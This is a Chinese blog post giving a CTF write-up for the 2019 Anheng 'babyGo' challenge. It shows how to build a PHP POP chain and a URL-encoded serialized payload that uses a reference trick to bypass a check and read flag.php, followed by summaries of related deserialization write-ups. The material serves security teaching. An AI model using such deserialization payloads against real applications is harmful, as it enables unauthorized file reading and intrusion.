babyGo(安恒2019.1 pop链的构造)

最新推荐文章于 2024-04-24 17:20:18 发布
原创 最新推荐文章于 2024-04-24 17:20:18 发布 · 2.3k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨PHP中pop链的使用技巧,通过实例展示如何利用pop链调用特定类方法,实现对flag.php文件的读取。文章解析了baby、cool及sec类之间的关系,演示了构造pop链的具体步骤。

周周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。
在这里插入图片描述
再看一看这道题目的baby类
在这里插入图片描述
也就是说这道题目中的类baby调用了sec类的read()方法。l
在这里插入图片描述
但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。
在这里插入图片描述
这个时候就要利用最开始提到的pop链来调用cool类的read方法。构造的方法如下(将构造函数中的sec改为cool即可)
在这里插入图片描述

注意到cool类中read方法的判断语句$this->nice->aaa === $this->nice->bbb,而且$this->nice->aaa = $sth;变量aaa被一个未知量$sth赋值了。这个时候我们利用指针$a->bbb =&$a->aaa;这样bbb的值就能随着aaa的变化而变化,在线编译一下(其中amazing是一个序列化的空的baby类的对象)

<?php
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new cool;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename='flag.php';     
    public $nice;
    public $amzing='O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A6%3B%7D'; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  
$a = new baby();
$a->bbb =&$a->aaa; 
$b=serialize($a);
echo urlencode($b);
?>

get方式传入结果,得到flag

php中的pop构造
2301_80913334的博客
03-28 1572
构造pop首先要做的就是找到目标,接着使用倒推法分析代码逻辑,一个一个魔术方法的绕过其中可能有一些魔术方法是障眼法需要仔细甄别,还有像例题4一样的有两个文件(一个文件被隐藏)的就需要多尝试一个一个文件的读取。技巧(一般题目):1、目标:echo $flag2、文件:$value = flag.php3、__toString():找echo4、__invoke():找return $***();
PHP反序列化—构造POP
Lemon's blog
04-03 4785
前言: 最近在刷题的时候发现这个PHP反序列化—POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
2019安恒一月月赛web1-babygo
0nc3的博客
01-28 2056
web1-babygo 考察知识点: PHP反序列化 POP构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4589
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
php反序列化学习(中)--pop构造
最新发布
qq_75120258的博客
04-24 1869
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
php审计之pop挖掘
weixin_51441054的博客
06-20 585
PHP审计之pop挖掘
安恒月赛19年1月wp
南天_princess的博客
02-08 919
web1 babygo 这个是php反序列化的题,打开题目获得源码如下: &amp;amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { protected $skyobj; public $aaa; public $bbb; function __construct() { ...
Requirement already satisfied: numpy in e:\babygo\anaconda\lib\site-packages (1.19.5)
06-09
这个说明你的numpy已经是最新版本的1.19.5了,但是这个版本低于pomegranate要求的最低版本1.20.0,因此会产生冲突。 你可以尝试安装pomegranate的旧版本,该版本兼容numpy 1.19.5。例如,以下命令将安装pomegranate...
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2500
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化之pop构造
m0_62422842的博客
04-06 8419
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
php反序列化—POP 构造利用
cosmoslin的博客
09-14 2968
POP 构造利用 一、POP简介 1POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
PHP 魔术方法浅谈
ansong8919的博客
03-23 278
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
安恒月赛-2019年6月-web
wyj_1216 House
07-02 3792
localview 题目 有个傲娇的管理员,只能从本地才能看到想要的~答案提交flag{}括号内的值。 writeup 根据题目提示 有两个注意点: 1、管理员 2、从本地 据此,我一开始进入了一条死路,直接在index.php的基础上,抓包,然后xff,实现欺骗,没有达到预期发现,于是考虑到管理员这一提示 正确解题过程: 首先先扫一下: 发现admin.php可访问, 于是访问后,发现: ...
ctf-pop
qq_32445755的博客
05-15 2167
POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
CTF里WEB题中的POP
dangejinghong的博客
09-03 846
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
PHP反序列化--简单ctf题--pop(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 5148
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 3577
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化——pop构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 1170
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的条是(反推)
POP[MRCTF2020]Ezpop
cxiaodi的博客
06-11 155
pop
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值